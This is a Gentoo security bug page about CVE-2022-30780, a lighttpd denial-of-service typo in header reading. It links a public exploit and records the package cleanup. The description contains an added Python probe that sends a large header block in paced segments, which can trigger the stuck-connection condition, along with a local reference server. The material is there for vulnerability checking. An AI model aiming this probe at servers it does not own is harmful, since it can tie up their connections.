
Bug 851234 (CVE-2022-30780)

Summary: <www-servers/lighttpd-1.4.59: DoS due to typo in connection handling
Product: Gentoo Security
Component: Vulnerabilities
Status: RESOLVED FIXED
Severity: minor
Priority: Normal
Version: unspecified
Hardware: All
OS: Linux
Reporter: John Helmert III <ajak>
Assignee: Gentoo Security <security>
CC: herb, proxy-maint
URL: https://redmine.lighttpd.net/issues/3059
Whiteboard: B3 [noglsa]
Package list:
Runtime testing required: ---

Description  John Helmert III (ajak)  2022-06-11 17:04:21 UTC
CVE-2022-30780:

Lighttpd 1.4.56 through 1.4.58 allows a remote attacker to cause a denial of service (CPU consumption from stuck connections) because connection_read_header_more in connections.c has a typo that disrupts use of multiple read operations on large headers.

A rather silly writeup exists, along with an exploit:

https://podalirius.net/en/cves/2022-30780/
https://github.com/p0dalirius/CVE-2022-30780-lighttpd-denial-of-service
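The condition the CVE text describes is a request whose header block is large enough that the server has to collect it over several read() calls. The following is an added example, not code from this bug, from the lighttpd project or from the linked writeup: a single-connection probe that sends such a request in small TCP segments and reports whether the server ever answers, together with a minimal reference server that accumulates headers correctly so the probe can be exercised offline. The header line count and length, the 1 KiB segment size and the inter-segment pause are assumptions chosen to keep the block under lighttpd's default 8 KiB request-field limit while still forcing multiple reads; the example does not reproduce the typo itself, which the page does not show.

```python
import socket
import socketserver
import threading
import time

# Assumed demo sizes: seven filler lines of ~1 KB keep the whole header block
# under lighttpd's default 8 KiB request-field limit (so a patched server can
# answer 200 instead of rejecting it), while 1 KiB segments with a short pause
# make the peer need several read() calls to see the terminating CRLFCRLF.
HEADER_LINES = 7
HEADER_LINE_LEN = 1000
SEGMENT = 1024
PAUSE = 0.02


def build_request(host: str) -> bytes:
    """Build a GET whose header block spans several kilobytes (constructed input)."""
    lines = [b"GET / HTTP/1.1", b"Host: " + host.encode("ascii")]
    for i in range(HEADER_LINES):
        lines.append(b"X-Filler-%d: " % i + b"x" * HEADER_LINE_LEN)
    lines.append(b"Connection: close")
    return b"\r\n".join(lines) + b"\r\n\r\n"


def send_in_segments(sock: socket.socket, data: bytes) -> int:
    """Write data in small segments with a pause so it arrives across several reads.

    Returns the number of segments written.
    """
    count = 0
    for off in range(0, len(data), SEGMENT):
        sock.sendall(data[off:off + SEGMENT])
        count += 1
        time.sleep(PAUSE)
    return count


def probe(host: str, port: int, timeout: float = 5.0) -> bool:
    """Return True if the server answers a request whose headers arrive in pieces.

    A server whose header reader goes wrong when the block does not land in one
    read leaves the connection stuck, so the probe times out and returns False.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        send_in_segments(sock, build_request(host))
        sock.settimeout(timeout)
        try:
            head = sock.recv(16)
        except socket.timeout:
            return False
    return head.startswith(b"HTTP/1.")


class HeaderAccumulatingHandler(socketserver.BaseRequestHandler):
    """Reference behaviour: keep reading until the CRLFCRLF terminator, then answer."""

    def handle(self) -> None:
        buf = b""
        while b"\r\n\r\n" not in buf:
            chunk = self.request.recv(4096)
            if not chunk:
                return  # peer closed before finishing its headers
            buf += chunk
        header_len = buf.index(b"\r\n\r\n") + 4
        body = b"header-bytes=%d\n" % header_len
        self.request.sendall(
            b"HTTP/1.1 200 OK\r\nContent-Length: %d\r\n"
            b"Connection: close\r\n\r\n" % len(body) + body
        )


def start_reference_server():
    """Start the reference server on a random loopback port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), HeaderAccumulatingHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def self_test() -> bool:
    """Run the probe against the local reference server; True means it answered."""
    srv, port = start_reference_server()
    try:
        return probe("127.0.0.1", port)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        ok = probe(sys.argv[1], int(sys.argv[2]))
        print("server answered" if ok else "no answer within timeout (connection stuck?)")
    else:
        print("reference server answered:", self_test())
```

Run it with a host and port to probe a server you own; without arguments it probes the built-in reference server. A timeout only shows that this one connection did not complete within the window, so confirm against the version (1.4.56 through 1.4.58 per the CVE text; Gentoo's fixed bound is 1.4.59 per the bug summary) rather than treating the probe alone as proof, and note that a server with its own slow-client protections may also close or stall such a request for unrelated reasons.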
Comment 1  Larry the Git Cow  2022-07-24 01:49:00 UTC
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=2f561442e589e60f79873b3f4db5e9935970ac46

commit 2f561442e589e60f79873b3f4db5e9935970ac46
Author:     Sam James <sam@gentoo.org>
AuthorDate: 2022-07-24 01:48:23 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-07-24 01:48:52 +0000

    www-servers/lighttpd: drop 1.4.55-r102, 1.4.58-r2, 1.4.59-r2
    
    Bug: https://bugs.gentoo.org/851234
    Bug: https://bugs.gentoo.org/830691
    Bug: https://bugs.gentoo.org/803821
    Signed-off-by: Sam James <sam@gentoo.org>

 www-servers/lighttpd/Manifest                      |   3 -
 www-servers/lighttpd/files/conf/lighttpd.conf      | 279 ---------------------
 .../files/lighttpd-1.4.59-nspr-header.patch        |  16 --
 www-servers/lighttpd/files/lighttpd.initd          |  79 ------
 www-servers/lighttpd/lighttpd-1.4.55-r102.ebuild   | 247 ------------------
 www-servers/lighttpd/lighttpd-1.4.58-r2.ebuild     | 268 --------------------
 www-servers/lighttpd/lighttpd-1.4.59-r2.ebuild     | 242 ------------------
 www-servers/lighttpd/metadata.xml                  |   2 -
 8 files changed, 1136 deletions(-)
Comment 2  Sam James  2022-07-24 01:50:05 UTC
GLSA vote: no.